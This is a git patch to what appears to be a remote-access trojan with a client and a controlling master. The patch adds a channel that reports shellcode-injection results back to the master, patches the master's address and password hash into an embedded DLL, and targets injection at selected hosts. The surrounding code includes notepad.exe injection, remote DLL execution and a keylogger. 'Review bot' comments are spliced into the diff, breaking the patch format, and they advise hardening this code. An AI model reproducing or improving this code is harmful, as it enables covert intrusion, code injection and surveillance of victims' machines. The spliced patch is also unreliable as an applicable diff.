From 250ae098980fa103cf7af6610361a0f435d86103 Mon Sep 17 00:00:00 2001
From: shaun <962914132@qq.com>
Date: Mon, 15 Dec 2025 16:21:00 +0100
Subject: [PATCH] Feature: Add command for client sending msg to master

---
 client/ClientDll.cpp | 1 +
 client/IOCPClient.cpp | 2 ++
 client/KernelManager.cpp | 14 ++++++---
 common/commands.h | 13 ++++++++
 server/2015Remote/2015Remote.rc | Bin 106518 -> 106546 bytes
 server/2015Remote/2015RemoteDlg.cpp | 45 +++++++++++++++++++++-------
 server/2015Remote/AudioDlg.h | 2 +-
 server/2015Remote/IOCPServer.h | 10 +++++++
 server/2015Remote/SettingDlg.cpp | 6 ++++
 9 files changed, 77 insertions(+), 16 deletions(-)

diff --git a/client/ClientDll.cpp b/client/ClientDll.cpp
index de8c48a..f0fd2d5 100644
--- a/client/ClientDll.cpp
+++ b/client/ClientDll.cpp
@@ -519,6 +519,7 @@ DWORD WINAPI StartClient(LPVOID lParam)
 LOGIN_INFOR login = GetLoginInfo(GetTickCount64() - dwTickCount, settings);
 while (ClientObject->IsRunning() && ClientObject->IsConnected() && !ClientObject->SendLoginInfo(login))
 WAIT_n(app.m_bIsRunning(&app), 5 + time(0)%10, 200);
+ while (ClientObject->IsRunning() && ClientObject->IsConnected()) WAIT_n(app.m_bIsRunning(&app), 10, 200);
 do {
 Manager->SendHeartbeat();
diff --git a/client/IOCPClient.cpp b/client/IOCPClient.cpp
index 0c70abc..81cf632 100644
--- a/client/IOCPClient.cpp
+++ b/client/IOCPClient.cpp
@@ -337,8 +337,10 @@ BOOL IOCPClient::ConnectServer(const char* szServerIP, unsigned short uPort)
 if (m_hWorkThread == NULL)
 {
 #ifdef _WIN32
+ m_bIsRunning = TRUE;
 m_hWorkThread = (HANDLE)__CreateThread(NULL, 0, WorkThreadProc,(LPVOID)this, 0, NULL);
 m_bWorkThread = m_hWorkThread ? S_RUN : S_STOP;
+ m_bIsRunning = m_hWorkThread ? TRUE : FALSE;
 #else
 pthread_t id = 0;
 m_hWorkThread = (HANDLE)pthread_create(&id, nullptr, (void* (*)(void*))IOCPClient::WorkThreadProc, this);
diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp
index f95e42d..c3329ff 100644
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
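Review bot: The added `while (ClientObject->IsRunning() && ClientObject->IsConnected()) WAIT_n(...)` line only returns once the client is stopped or the connection drops, so the `do { Manager->SendHeartbeat();` loop that follows is not entered while the session is up. If heartbeats are now produced elsewhere that is fine, but then the do-loop is dead on the connected path and deserves a comment such as `// park here for the life of the connection; the loop below only runs after a disconnect`; if they are not, this change silently stops the heartbeat. StartClient's body continues outside the hunk, so the do-loop's exit condition is not visible here.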
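Review bot: `m_bIsRunning` is set only inside `#ifdef _WIN32`; the `#else` branch visible here starts the worker with pthread_create and leaves the flag untouched, so on non-Windows builds `IsRunning()` will not reflect the new thread unless it is set somewhere outside this hunk. Mirror the assignment after the pthread_create line, but set it from pthread_create's return value (0 means success) rather than from the `m_hWorkThread ? TRUE : FALSE` test used in the Windows branch, which would be inverted here because the handle holds that return code. The flag is also written twice in the Windows branch (TRUE before `__CreateThread`, then from the handle); a one-line comment such as `// set before the thread starts so the worker sees it running` would stop a later cleanup from deleting the first write. ConnectServer continues outside the hunk.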
@@ -141,7 +141,8 @@ typedef struct DllExecParam {
 DllExecuteInfo info;
 PluginParam param;
 BYTE* buffer;
- DllExecParam(const DllExecuteInfo& dll, const PluginParam& arg, BYTE* data) : info(dll), param(arg)
+ CManager* manager;
+ DllExecParam(const DllExecuteInfo& dll, const PluginParam& arg, BYTE* data, CManager* m) : info(dll), param(arg), manager(m)
 {
 buffer = new BYTE[info.Size];
 memcpy(buffer, data, info.Size);
@@ -180,6 +181,7 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
 DllExecParam* dll = (DllExecParam*)param;
 DllExecuteInfo info = dll->info;
 PluginParam pThread = dll->param;
+ CManager* This = dll->manager;
 #ifdef _DEBUG
 WriteBinaryToFile((char*)dll->buffer, info.Size, info.Name);
 DllRunner* runner = new DefaultDllRunner(info.Name);
@@ -212,8 +214,12 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
 bool flag = info.CallType == CALLTYPE_IOCPTHREAD;
 ShellcodeInj inj(dll->buffer, info.Size, flag ? "run" : 0, flag ? &pThread : 0, flag ? sizeof(PluginParam) : 0);
 if (info.Pid < 0) info.Pid = GetCurrentProcessId();
- bool ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true);
- Mprintf("Inject %s to process [%d] %s\n", info.Name, info.Pid, ret ? "succeed" : "failed");
+ int ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true);
+ char buf[256];
+ sprintf_s(buf, "Inject %s to process [%d] %s", info.Name, info.Pid ? info.Pid : ret, ret ? "succeed" : "failed");
+ Mprintf("%s\n", buf);
+ ClientMsg msg("代码注入", buf);
+ This->SendData((LPBYTE)&msg, sizeof(msg));
 }
 SAFE_DELETE(dll);
 SAFE_DELETE(runner);
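Review bot: The new `manager` member is a raw pointer whose ownership and lifetime are not stated, yet the struct is handed to a worker thread (`ExecuteDLLProc`) that outlives the caller's stack frame. Add a note where the field is declared, e.g. `CManager* manager; // non-owning; the CManager must outlive the ExecuteDLLProc thread that reads it`, so the constraint is visible to whoever next touches the struct. The struct's destructor and the remainder of its definition are outside the hunk.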
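Review bot: `sprintf_s(buf, "Inject %s to process [%d] %s", info.Name, ...)` into a 256-byte `buf` is a hard failure, not a truncation, when `info.Name` is long: on MSVC the secure CRT invokes the invalid-parameter handler (process termination by default) and leaves `buf` empty. The length of `info.Name` is not bounded anywhere in this function (it arrives in the DllExecuteInfo received from the master in the OnReceive hunk), so use `_snprintf_s(buf, sizeof(buf), _TRUNCATE, "Inject %s to process [%d] %s", ...)` or bound the name with `%.200s`. The `int ret` that replaced `bool ret` is printed as the pid when `info.Pid` is 0, which only makes sense if `InjectProcess(name, true)` returns the spawned process id — if so, a comment `// ret is the spawned pid when no Pid was requested` would make the ternary readable. ExecuteDLLProc continues after the hunk.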
@@ -522,7 +528,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 }
 if (data) {
 PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit, m_conn);
- CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data), 0, NULL));
+ CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data, this), 0, NULL));
 Mprintf("Execute '%s'%d succeed - Length: %d\n", info->Name, info->CallType, info->Size);
 }
 break;
diff --git a/common/commands.h b/common/commands.h
index 8b36316..6671580 100644
--- a/common/commands.h
+++ b/common/commands.h
@@ -268,6 +268,7 @@ enum {
 TOKEN_ERROR = 230, // ʾ
 TOKEN_SHELL_DATA = 231, // ն˽
 CMD_EXECUTE_DLL = 240, // ִд
+ TOKEN_CLIENT_MSG = 241, // ͻϢ
 };
 enum MachineCommand {
@@ -1154,4 +1155,16 @@ typedef struct CharMsg {
 }
 }CharMsg;
+typedef struct ClientMsg {
+ char cmd;
+ char title[31];
+ char text[512];
+ ClientMsg() { memset(this, 0, sizeof(*this)); }
+ ClientMsg(const char* title, const char* text) {
+ cmd = TOKEN_CLIENT_MSG;
+ strcpy_s(this->title, title ? title : "ʾϢ");
+ strcpy_s(this->text, text ? text : "");
+ }
+}ClientMsg;
+
 #endif
diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc
index ed447ac3972b92d967a0f30576071ae5216c0e57..15a5d62c865aa9b290374cc2fdba9f1a39b0ef70 100644
GIT binary patch
delta 25
hcmbPsfNj$OwhdXDlYQFkCe1Z!-lw^JpC)5O832_k3iAK}

delta 22
ecmdmVfNk0VwhdXDlWnF1HQ&(OenXQnstf>jx(V6<

diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index 04fb36e..f835772 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
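Review bot: `this` is captured into a DllExecParam that runs on a thread whose handle is closed immediately by `CloseHandle(__CreateThread(...))`, so nothing joins or signals it before the CKernelManager can go away; if the manager is torn down on disconnect while an injection is still in progress (not visible from this hunk), the `This->SendData` call in ExecuteDLLProc will touch a freed object. Either keep the thread handle and wait on it during teardown, or have ExecuteDLLProc test the exit flag it already receives through `PluginParam` (`&g_bExit`) before sending, and record the chosen rule in a comment next to this line. OnReceive's switch continues outside the hunk.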
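Review bot: `strcpy_s(this->title, ...)` and `strcpy_s(this->text, ...)` abort rather than truncate when the source is longer than `title[31]` / `text[512]`: the array overloads deduce the destination size, and an oversize source trips the secure-CRT invalid-parameter handler. The two callers in this patch pass a short literal and a 256-byte buffer, but the constructor takes any `const char*`, so switch to `strncpy_s(this->title, title ? title : <the default literal>, _TRUNCATE)` and the same for `text`, and it stays safe as call sites grow. Since the object is sent and parsed as raw bytes (`sizeof(msg)`), a comment stating that the layout is all-`char`, 544 bytes, and must stay that way would help the receiving side.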
@@ -293,6 +293,22 @@ DllInfo* ReadTinyRunDll(int pid)
 std::string name = TINY_DLL_NAME;
 DWORD fileSize = 0;
 BYTE * dllData = ReadResource(IDR_TINYRUN_X64, fileSize);
+ std::string s(skCrypt(FLAG_FINDEN)), ip, port;
+ int offset = MemoryFind((char*)dllData, s.c_str(), fileSize, s.length());
+ if (offset != -1) {
+ std::string ip = THIS_CFG.GetStr("settings", "master", "");
+ int nPort = THIS_CFG.Get1Int("settings", "ghost", ';', 6543);
+ std::string master = ip.empty() ? "" : ip + ":" + std::to_string(nPort);
+ CONNECT_ADDRESS* server = (CONNECT_ADDRESS*)(dllData + offset);
+ if (!master.empty()) {
+ splitIpPort(master, ip, port);
+ server->SetServer(ip.c_str(), atoi(port.c_str()));
+ server->SetAdminId(GetMasterHash().c_str());
+ server->iType = CLIENT_TYPE_MEMDLL;
+ server->parentHwnd = g_2015RemoteDlg ? (uint64_t)g_2015RemoteDlg->GetSafeHwnd() : 0;
+ memcpy(server->pwdHash, GetPwdHash().c_str(), 64);
+ }
+ }
 // 设置输出参数
 auto md5 = CalcMD5FromBytes(dllData, fileSize);
 DllExecuteInfo info = { SHELLCODE, fileSize, CALLTYPE_DEFAULT, {}, {}, pid };
@@ -839,8 +855,8 @@ LRESULT CMy2015RemoteDlg::OnShowErrMessage(WPARAM wParam, LPARAM lParam)
 m_CList_Message.InsertItem(0, title ? *title : "操作错误");
 m_CList_Message.SetItemText(0, 1, strTime);
 m_CList_Message.SetItemText(0, 2, text ? *text : "内部错误");
- delete title;
- delete text;
+ if(title)delete title;
+ if(text)delete text;
 return S_OK;
 }
@@ -2226,6 +2242,11 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
 // 【L】:主机上下线和授权
 // 【x】:对话框相关功能
 switch (cmd) {
+ case TOKEN_CLIENT_MSG: {
+ ClientMsg *msg =(ClientMsg*)ContextObject->InDeCompressedBuffer.GetBuffer(0);
+ PostMessageA(WM_SHOWERRORMSG, (WPARAM)new CString(msg->text), (LPARAM)new CString(msg->title));
+ break;
+ }
 case TOKEN_AUTH: {
 BOOL valid = FALSE;
 if (len > 20) {
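Review bot: `memcpy(server->pwdHash, GetPwdHash().c_str(), 64)` copies exactly 64 bytes from a temporary std::string regardless of its length; if `GetPwdHash()` ever returns fewer than 64 characters this reads past the string's storage, and nothing here ties the literal 64 to the size of `pwdHash`. Bound it with the real sizes, e.g. `const std::string h = GetPwdHash(); memcpy(server->pwdHash, h.data(), std::min(sizeof(server->pwdHash), h.size()));`. The inner `std::string ip = THIS_CFG.GetStr(...)` also shadows the `ip` declared on the first added line, leaving the outer one unused — drop the outer declaration or assign to it instead. `atoi(port.c_str())` feeds unvalidated config text into `SetServer`; a range check before narrowing to a port number is cheap and avoids a silently wrong address in the patched DLL. ReadTinyRunDll continues outside the hunk.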
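Review bot: The new `TOKEN_CLIENT_MSG` case casts the decompressed buffer to `ClientMsg*` and builds two `CString`s from it without consulting `len`, while the `TOKEN_AUTH` case directly below does check `len > 20`; a client that sends a packet shorter than `sizeof(ClientMsg)`, or one whose `text`/`title` is not NUL-terminated, makes the master read past the received data. The client is the less trusted peer here, so guard it: `if (len < sizeof(ClientMsg)) break;` and construct with explicit bounds, `new CString(msg->text, (int)strnlen(msg->text, sizeof(msg->text)))` and likewise for `msg->title`. MessageHandle continues outside the hunk.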
@@ -4119,14 +4140,16 @@ void CMy2015RemoteDlg::OnParamKblogger()
 void CMy2015RemoteDlg::OnOnlineInjNotepad()
 {
 auto tinyRun = ReadTinyRunDll(0);
- EnterCriticalSection(&m_cs);
- for (auto i = m_HostList.begin(); i != m_HostList.end(); ++i) {
- context* ctx = *i;
- if (!ctx->IsLogin())
- continue;
- Buffer* buf = tinyRun->Data;
- ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo));
- }
- LeaveCriticalSection(&m_cs);
+ EnterCriticalSection(&m_cs);
+ POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition();
+ while (Pos) {
+ int iItem = m_CList_Online.GetNextSelectedItem(Pos);
+ context* ctx = (context*)m_CList_Online.GetItemData(iItem);
+ if (!ctx->IsLogin())
+ continue;
+ Buffer* buf = tinyRun->Data;
+ ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo));
+ }
+ LeaveCriticalSection(&m_cs);
 SAFE_DELETE(tinyRun);
 }
diff --git a/server/2015Remote/AudioDlg.h b/server/2015Remote/AudioDlg.h
index a970d85..2a96a41 100644
--- a/server/2015Remote/AudioDlg.h
+++ b/server/2015Remote/AudioDlg.h
@@ -21,7 +21,7 @@ public:
 static DWORD WINAPI WorkThread(LPVOID lParam);
- void CAudioDlg::OnReceiveComplete(void);
+ void OnReceiveComplete(void);
 // Ի
 enum { IDD = IDD_DIALOG_AUDIO };
diff --git a/server/2015Remote/IOCPServer.h b/server/2015Remote/IOCPServer.h
index f798136..bbeb5be 100644
--- a/server/2015Remote/IOCPServer.h
+++ b/server/2015Remote/IOCPServer.h
@@ -133,6 +133,16 @@ public:
 virtual ~CDialogBase() {}
 public:
+ virtual BOOL ReceiveCommonMsg() {
+ switch (m_ContextObject->InDeCompressedBuffer.GetBYTE(0)) {
+ case TOKEN_CLIENT_MSG: {
+ ClientMsg* msg = (ClientMsg*)m_ContextObject->InDeCompressedBuffer.GetBuffer(0);
+ PostMessageA(WM_SHOWERRORMSG, (WPARAM)new CString(msg->text), (LPARAM)new CString(msg->title));
+ return TRUE;
+ }
+ }
+ return FALSE;
+ }
 virtual void OnReceiveComplete(void) = 0;
 // ΪǷڽ
 void MarkReceiving(bool recv = true)
diff --git a/server/2015Remote/SettingDlg.cpp b/server/2015Remote/SettingDlg.cpp
index ec570e9..8dfc43f 100644
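Review bot: `context* ctx = (context*)m_CList_Online.GetItemData(iItem);` is dereferenced on the next line without a null check; a selected row whose item data was never set, or was cleared when the host dropped, would crash the UI thread while `m_cs` is held. Replace the test with `if (!ctx || !ctx->IsLogin()) continue;`. The hunk also narrows the target set from every logged-in host to the selected rows only, a behaviour change the commit subject does not mention — a comment such as `// inject into the selected hosts only` above the loop would record the intent.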
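Review bot: `ReceiveCommonMsg` reads a full `ClientMsg` (544 bytes) out of `InDeCompressedBuffer` without checking how much was received, and the `CString` constructors run to the first NUL, so a short or unterminated message from a client reads past the buffer; the buffer's length accessor is not visible in this hunk, but the same `length >= sizeof(ClientMsg)` guard the main dialog's handler needs belongs here, along with bounded construction via `strnlen(msg->text, sizeof(msg->text))`. The two `new CString` objects are only released if the posted `WM_SHOWERRORMSG` is handled by this dialog, and the only handler in this patch is `CMy2015RemoteDlg::OnShowErrMessage`; if CDialogBase-derived dialogs do not map that message the strings leak on every call. No call site for `ReceiveCommonMsg` is added by this patch, so a comment stating which `OnReceiveComplete` implementations are expected to call it first would help.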
--- a/server/2015Remote/SettingDlg.cpp
+++ b/server/2015Remote/SettingDlg.cpp
@@ -139,6 +139,12 @@ BOOL CSettingDlg::OnInitDialog()
 BOOL frp = THIS_CFG.GetInt("frp", "UseFrp");
 ((CButton*)GetDlgItem(IDC_RADIO_FRP_OFF))->SetCheck(!frp);
 ((CButton*)GetDlgItem(IDC_RADIO_FRP_ON))->SetCheck(frp);
+#ifndef _WIN64
+ GetDlgItem(IDC_RADIO_FRP_OFF)->EnableWindow(FALSE);
+ GetDlgItem(IDC_RADIO_FRP_ON)->EnableWindow(FALSE);
+ GetDlgItem(IDC_EDIT_FRP_PORT)->EnableWindow(FALSE);
+ GetDlgItem(IDC_EDIT_FRP_TOKEN)->EnableWindow(FALSE);
+#endif
 m_nFrpPort = THIS_CFG.GetInt("frp", "server_port", 7000);
 m_sFrpToken = THIS_CFG.GetStr("frp", "token").c_str();